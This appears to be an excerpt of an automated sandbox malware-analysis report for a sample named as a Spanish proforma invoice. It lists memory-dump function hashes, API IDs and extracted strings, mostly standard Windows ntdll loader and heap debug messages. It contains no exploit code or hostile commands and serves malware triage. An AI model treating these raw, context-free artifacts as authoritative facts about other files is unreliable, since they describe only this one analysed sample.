                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                  • API String ID: 0-2368682639
                                                  • Opcode ID: 899afecc240182b1cfead50c2ff7723bedc814f215c9d1dacf9159f70490fc23
                                                  • Instruction ID: f51e78ec402e3d7dbbaf527c82a0b1e12465c0c0fecc93d4a6211ceb8336964d
                                                  • Opcode Fuzzy Hash: 899afecc240182b1cfead50c2ff7723bedc814f215c9d1dacf9159f70490fc23
                                                  • Instruction Fuzzy Hash: 02817DB1901318AFEB10CFA5CC44BAEBBB5FB48754FA0425AF944BB241C778A945CB60
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                  • API String ID: 3446177414-1700792311
                                                  • Opcode ID: 6ddb48e5ef2cb1c796187a31c61ff07758120460ce283eac8e2a2cf9fb7e08c9
                                                  • Instruction ID: acd65ad363657bf4dd04f333d52b0bb4a7c27069465cf35bb6c6f06b54da6410
                                                  • Opcode Fuzzy Hash: 6ddb48e5ef2cb1c796187a31c61ff07758120460ce283eac8e2a2cf9fb7e08c9
                                                  • Instruction Fuzzy Hash: BDD11E79910685DFDB02CFA4C808AADBBF2FF49714F848449E984AF212C739D956CF61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.u6
                                                  • API String ID: 0-3276589498
                                                  • Opcode ID: e52ed7e93e6ac61df3311c10311df9c9b27127ab59a319177687cacc268cbc2b
                                                  • Instruction ID: be1803a94c6f3b3fe05d54fb75459916ebc7a358cf90b6c41809f74284f0e1d2
                                                  • Opcode Fuzzy Hash: e52ed7e93e6ac61df3311c10311df9c9b27127ab59a319177687cacc268cbc2b
                                                  • Instruction Fuzzy Hash: 42B18FB59083519FD711CF25C884A6FB7E9AF84754F81492EF994DB200EBB0D948CB92
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                  • API String ID: 0-2515994595
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 3446177414-1745908468
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 3672651C
                                                    • Part of subcall function 36726565: RtlDebugPrintTimes.NTDLL ref: 36726614
                                                    • Part of subcall function 36726565: RtlDebugPrintTimes.NTDLL ref: 3672665F
                                                  Strings
                                                  • LdrpInitShimEngine, xrefs: 36789783, 36789796, 367897BF
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 367897A0, 367897C9
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 367897B9
                                                  • apphelp.dll, xrefs: 36726446
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3678977C
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 36789790
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-204845295
                                                  Strings
                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3672D0E6
                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 3672D136
                                                  • @, xrefs: 3672D2B3
                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3672D06F
                                                  • @, xrefs: 3672D09D
                                                  • h.u6, xrefs: 3678A5D2
                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3672D263
                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3672D202
                                                  • @, xrefs: 3672D24F
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.u6
                                                  • API String ID: 0-183300548
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 3675D879
                                                    • Part of subcall function 36734779: RtlDebugPrintTimes.NTDLL ref: 36734817
                                                  Strings
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1975516107
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                  • API String ID: 0-2224505338
                                                  Strings
                                                  • HandleTraces, xrefs: 367B890F
                                                  • VerifierDlls, xrefs: 367B893D
                                                  • VerifierFlags, xrefs: 367B88D0
                                                  • VerifierDebug, xrefs: 367B8925
                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 367B86E7
                                                  • AVRF: -*- final list of providers -*- , xrefs: 367B880F
                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 367B86BD
                                                  Similarity
                                                  • API ID:
                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                  • API String ID: 0-3223716464
                                                  Strings
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3679A7AF
                                                  • DGp6, xrefs: 36752382
                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3679A79F
                                                  • LdrpDynamicShimModule, xrefs: 3679A7A5
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DGp6$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2939573604
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                  • API String ID: 0-122214566
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-792281065
                                                  Strings
                                                  • LdrpInitializeProcess, xrefs: 3676C5E4
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 3676C5E3
                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 367A7FF0
                                                  • LdrpInitializeImportRedirection, xrefs: 367A7F82, 367A7FF6
                                                  • Loading import redirection DLL: '%wZ', xrefs: 367A7F7B
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 367A7F8C, 367A8000
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 0-475462383
                                                  Strings
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 367A1F8A
                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 367A1FA9
                                                  • RtlGetAssemblyStorageRoot, xrefs: 367A1F6A, 367A1FA4, 367A1FC4
                                                  • SXS: %s() passed the empty activation context, xrefs: 367A1F6F
                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 367A1F82
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 367A1FC9
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                  • API String ID: 0-861424205
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-2283098728
                                                  APIs
                                                  Strings
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 367A80E9
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 367A80F3
                                                  • Failed to reallocate the system dirs string !, xrefs: 367A80E2
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1783798831
                                                  APIs
                                                  Strings
                                                  • LdrpCheckRedirection, xrefs: 367B450F
                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 367B4508
                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 367B4519
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                  • API String ID: 3446177414-3154609507
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                  • API String ID: 0-3061284088
                                                  APIs
                                                  Strings
                                                  • kLsE, xrefs: 367305FE
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36730586
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 3446177414-2547482624
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LUp6$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                  • API String ID: 0-3287053716
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                  • API String ID: 0-379654539
                                                  Strings
                                                  • LdrpInitializeProcess, xrefs: 36768342
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 36768341
                                                  • @, xrefs: 367684B1
                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3676847E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-1918872054
                                                  Strings
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 367A20C0
                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 367A1FE3, 367A20BB
                                                  • SXS: %s() passed the empty activation context, xrefs: 367A1FE8
                                                  • .Local, xrefs: 367627F8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                  • API String ID: 0-1239276146
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}q6
                                                  • API String ID: 0-1370236184
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LUp6$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                  • API String ID: 0-2650556864
                                                  Strings
                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 36790DEC
                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 36790E2F
                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 36790EB5
                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 36790E72
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                  • API String ID: 0-1468400865
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 0-2586055223
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                  • API String ID: 2994545307-1391187441
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                  • API String ID: 0-1880532218
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                  • API String ID: 0-1168191160
                                                  Strings
                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36731648
                                                  • HEAP: , xrefs: 367314B6
                                                  • HEAP[%wZ]: , xrefs: 36731632
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 367A0128
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 367A00C7
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 367A00F1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                  • API String ID: 0-2391371766
                                                  Strings
                                                  • GlobalizationUserSettings, xrefs: 3680B3B4
                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3680B3AA
                                                  • TargetNtPath, xrefs: 3680B3AF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                  • API String ID: 0-505981995
                                                  Strings
                                                  • HEAP: , xrefs: 3678E442
                                                  • HEAP[%wZ]: , xrefs: 3678E435
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3678E455
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  Strings
                                                  • LdrpCompleteMapModule, xrefs: 3679A39D
